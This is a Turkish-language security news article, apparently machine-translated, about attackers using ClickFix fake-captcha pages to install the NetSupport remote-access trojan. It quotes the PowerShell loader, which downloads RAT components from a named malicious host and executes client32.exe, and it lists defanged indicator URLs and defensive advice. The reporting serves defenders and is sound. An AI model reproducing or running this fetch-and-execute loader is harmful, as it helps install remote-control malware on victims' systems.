Netsupport Rat Saldırganları Mağdur Sistemlerine Tam Erişim


Netsupport Rat Saldırganları Mağdur Sistemlerine Tam Erişim

Siber güvenlik uzmanları, son aylarda Netsupport Uzaktan Erişim Truva Eden Truva (sıçan) kullanımında önemli bir artış gözlemlediler, bu da saldırganların tehlikeye atılmış sistemler üzerinde tam kontrol sahibi olmasını sağlayan kötü niyetli bir araç.

Etkinlikteki bu artış, kullanıcıları kötü niyetli PowerShell komutlarını yürütmeye kandıran sofistike bir sosyal mühendislik tekniği olan “ClickFix” başlangıç ​​erişim vektörü (IAV) ile bağlantılıdır.

Başlangıçta 1989 yılında meşru bir uzaktan BT destek aracı olarak geliştirilen Netsupport Sıçanı, ekranları izlemek, klavyeleri ve fareleri kontrol etmek, dosyaları yüklemek ve indirmek ve kötü amaçlı komutlar yürütmek için siber suçlular tarafından silahlandırılmıştır.

Hizmet Olarak Siem

Tespit edilmezse, fidye yazılımı saldırıları, veri ihlalleri ve iş operasyonlarının bozulması da dahil olmak üzere ciddi sonuçlara yol açabilir.

ClickFix Sahte Açılış Sayfası (Kaynak – Esentir)

ClickFix tekniği, tehlikeye atılan web sitelerine sahte captcha sayfaları enjekte etmeyi ve kullanıcılara PowerShell komutlarını kopyalayıp yürütmelerini öğretmeyi içerir.

Bu komutlar, saldırgan kontrolündeki ağ geçitlerine komut ve kontrol (C2) bağlantıları oluşturan Netsupport Rat istemcisini indirir ve yükler.

Netsupport sıçanının dağıtımı (kaynak – esentir)

Esentire analistleri, sıçan yüklerinin genellikle yolda “.png” içeren URL’lerde barındırıldığını ve C2 ağ geçidi URL’lerinin sıklıkla “fakeurl.htm” ı içerdiğini keşfettiler.

Netsupport Sıçan yükü barındırma ve C2 (kaynak – esentir)

Saldırı analizi

ClickFix saldırılarında kullanılan PowerShell betiği genellikle aşağıdaki adımları içerir:-

  1. Rastgele klasör oluşturma:
   $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
   $randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
   New-Item -ItemType Directory -Path $randomFolderPath
  1. Sıçan bileşenlerini indirme:-
   $url = "http://fbinter.com/a/1.png"
   $file = $randomFolderPath + "\client32.ini"
   Invoke-WebRequest $url -OutFile $file

Benzer komutlar gibi diğer bileşenleri indirmek için kullanılır client32.exe ve yapılandırma dosyaları.

  1. Sıçanı yürütmek:-
   $file12 = $randomFolderPath + "\client32.exe"
   Start-Process $file12
PowerShell Script İçeriği (Kaynak – Esentir)

Netsupport sıçan ve ClickFix saldırılarına karşı korumak için kuruluşlar, tüm kurumsal varlıklar için uç nokta algılama ve yanıt (EDR) ajanlarını dağıtmalı ve çalışanları ClickFix gibi ortaya çıkan tehditler konusunda eğitmek için güvenlik bilinci eğitimi almalıdır.

Kullanıcı izinlerini sınırlamak bile yetkisiz yazılım kurulumlarını önlemeye yardımcı olabilir.

Kuruluşlar ayrıca RUN istemini devre dışı bırakarak ve Grup İlkesi Nesneleri (GPO) veya Windows Defender Uygulama Kontrolü (WDAC) kullanarak WScript.exe ve MSHTA.EXE’yi kısıtlayarak güvenliği artırmalıdır.

En son IOC’ler hakkında bilgi sahibi olmak ve etkili güvenlik kontrolleri uygulamak, bu sofistike tehditlere karşı korunmak için çok önemlidir.

Uzlaşma Göstergeleri (IOCS)

  • ClickFix sayfaları:
  • HXXP[://]EVeverify[.]com/captcha[.]HTML
  • Hxxps[://]eiesoft.com/ray-ifify[.]HTML
  • Netsupport sıçan yükü teslimatı:
  • HXXP[://]fbinter[.]com/a/1[.]png
  • HXXP[://]fbinter[.]com/a/2[.]png
  • HXXP[://]fbinter[.]com/a/3[.]png

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free



Source link